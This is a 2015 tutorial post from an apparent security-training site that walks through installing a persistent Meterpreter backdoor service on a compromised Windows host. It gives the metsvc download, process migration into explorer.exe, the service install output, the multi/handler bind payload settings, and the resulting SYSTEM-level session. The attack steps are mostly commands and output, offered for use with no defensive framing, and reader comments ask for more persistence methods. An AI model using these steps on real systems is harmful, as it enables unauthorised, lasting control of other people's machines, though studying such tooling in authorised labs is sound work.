Meterpreter Backdoor

July 14, 2015 | Views: 4955

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Meterpreter Backdoor requires a script named metsvc It’s a list of useful commands use to interact with a victim’s machine from a backdoor.

To get that script, go to: http://www.phreedom.org/software/metsvc/

Ok, now I assume you downloaded the script and have configured the msfconsole for it.

Let’s start…

After our session has been started in meterpreter metasploit , we need to list the processes by typing ps:


meterpreter > ps

It will give a list of all running tasks

e.g.

001 explorer.exe
002 notepad.exe

etc.

For selecting, type migrate and then the task number 001 for explorer or other:

meterpreter > migrate 001
[*] Migrating to 001...
[*] Migration completed successfully.

We need to start metsvc:

meterpreter > run metsvc
[*] Creating a meterpreter service on port 1337
[*] Creating a temporary installation directory C:DOCUME~1ThinkerLOCALS~1TempClTpasVnksh...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
[*]      * Installing service metsvc
* Starting service
Service metsvc successfully installed.

For help, you can see additional options by typing:

meterpreter > run metsvc -h
[*]
OPTIONS:

-A        Automatically start a matching multi/handler to connect to the service
-h        This help menu
-r        Uninstall an existing Meterpreter service (files must be deleted manually)

We need to handle metsvc for interaction with the system. Here, we’ll use tcp_bind payload from metsvc:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp

Setting a port listener on specific local port for the local host:

msf exploit(handler) > set LPORT 31337
LPORT => 31337

Target IP

msf exploit(handler) > set RHOST 192.168.1.0
RHOST => 192.168.1.0

Help and options about target:

msf exploit(handler) > show options

Module options:

Name  Current Setting  Required  Description
----  ---------------  --------  -----------


Payload options (windows/metsvc_bind_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LPORT     1337            yes       The local port
RHOST     192.168.1.0    no        The target address


Exploit target:

Id  Name
--  ----
0   Wildcard Target


At last…fire!!

msf exploit(handler) > exploit

We’ve owned it. We can see any task and can interact with system.

meterpreter > pwd
C:WINDOWSsystem32
meterpreter > getuid
Server username: ThinkerSYSTEM

Thanks and stay tuned for more.

— Multi Thinker

Want to learn more about backdoors? Start learning now by enrolling in our FREE courses:

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
3 Comments
  1. The thing u told me to download in the first part of this is picked up as spyware by iceweasel but idc cas this is a vm but could u pls describe how i download it a little better since i have the files but the website u send me to doesnt explain how to get it well so can somone pls reply and help me understand. thanku and sorry iam a noob

    BUT OVERALL gr8 guide m8

  2. tnx for this very nice tutorial 😀 please make Persistence backdooring and how to do it in windows 7 and 8 tnx 🙂 again

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel